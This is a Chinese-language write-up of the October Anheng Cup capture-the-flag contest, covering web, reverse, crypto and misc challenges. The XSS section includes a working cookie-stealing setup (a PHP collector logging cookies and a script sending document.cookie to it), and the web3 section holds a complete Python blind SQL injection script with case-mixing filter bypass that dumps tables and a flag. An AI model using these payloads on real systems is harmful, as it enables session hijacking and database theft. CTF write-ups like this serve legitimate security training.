十月安恒杯 writeup

总结说会的正题不难,不会的实在是难的可以…

web1 iphone6

直接将user-agent改成手机的就可以了,很简单不截图

web2 jshunt

这个题目我没有调出来来,但是明显就是xss,很困惑。
首先扫描了一下目录发现了tmp目录和up目录。up目录明显就是我们上传的jpg文件,有文件类型限制,但是没有 MIME检查,写入后是base64加密后的内容。而tmp内容更是直截了当,可以构造<html><script src=></script></html>这样的,貌似没有同源检查,我的思路是上传js内容到jpg文件中,然后让tmp的html文件调用。但是我用国外服务器x不到?用国内网站x不到???自己在本地谢了一个脚本还是x不到???然后我就迷了…
最后发现我犯了一个及其2逼的问题<script>标签引用的只能是js,而不是html(因为原来的html用的实在是太多了…)最后是我的编码的问题…哭晕,本地搭载了一下
flag.php

<?php
if(@$_GET['cookie']){
    $myfile = fopen("./1.txt", "a+");
    fwrite($myfile, $_GET['cookie']."\n");
    fclose($myfile);
}
?>

test.html

<html><script src=wamp.html></script></html>

wamp.html(就是在这里犯得二)

window.location.href="http://127.0.0.1/flag.php?cookie="+document.cookie

web3 绕过看门狗

非常简单的注入,需要大小写绕过而已,其他都可以绕过了。直接上脚本吧,比sqlmap好用感觉

#_*_coding:utf-8_*_
import hashlib 
import re,requests
url = 'http://192.168.5.13/viewld.do?ldid=2%20aNd%20'
temp=0
def pre(string,pos,l,r):
    global temp
    if l>r: 
        return 
    mid=(l+r)/2
    tempurl=url+'(seLect asCii(suBstr(('+string+') fROm '+str(pos)+' fOr 1))<='+str(mid)+')'
    #print tempurl
    html = requests.get(tempurl).text
    #print html,len(html)
    if len(html)>1200:
        flag=1
        temp=mid
        temp=max(temp,mid)
        pre(string,pos,l,mid-1)
    else :
        pre(string,pos,mid+1,r)
flag=''
def work(str):
    global temp
    global flag
    for l in range(1,50):
        temp=0
        pre(str,l,30,130)
        if temp>0 and temp !=30:
            flag+=chr(temp)
            print flag
        else :
            break
#insert="seLect database()"  news

#insert="SELeCT SCHEma_NaME FRoM infOrmation_schEma.SCHEmaTA liMit 1,1"
#insert="SELeCT Table_NaME FRoM infOrmation_schEma.tabLES whEre TAbLE_SChEMA='news' liMit 1,1"
#tb_admin   tb_flag
#insert="SELeCT COLuMN_NaME FRoM infOrmation_schEma.COLuMNS whEre Table_NaME='tb_flag' liMit 0,1"
#flag
insert="SELeCT flag FRoM tb_flag liMit 0,1"
work(insert)
#flag{1396265adbb760c86475304b98e3f61c}

reverse

这个逆向比较困难,我是投机取巧地找到了原题…但是这个题目是一个非常好的题目,是一个算法,算法本身有轮转等工作,而且有可能有多解,非常好的题目,过一段时间会单独复现一下。

Crypto

这个我也是迷了,好难猜啊…作业时密文,然后报纸中替换掉的是密文,根据语境猜测替换表是什么…

这里写图片描述

Misc 1 别劫持的神秘礼物

大水题,直接在tcp流中找到访问页面的包,账号密码就在上面,连起来md5一下就好了。

Misc 2 找webshell

这个题目可是坑死我了…一开始像是既然是上传的文件,我就去找一下上传的节点有什么,发现什么都没有,后来一想人家可能藏到了别的地方,用seayfinder没找到,然后在网上找了一个在线扫描shell的站,但是扫不出来…
下载他的安装包离线扫扫描出来了,在include/include.php下存在一个pass就是flag了,具体他是做什么的还没来得及看,貌似是个大马,只是根据提示做了出来^_^

总结:

我还是太菜了

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值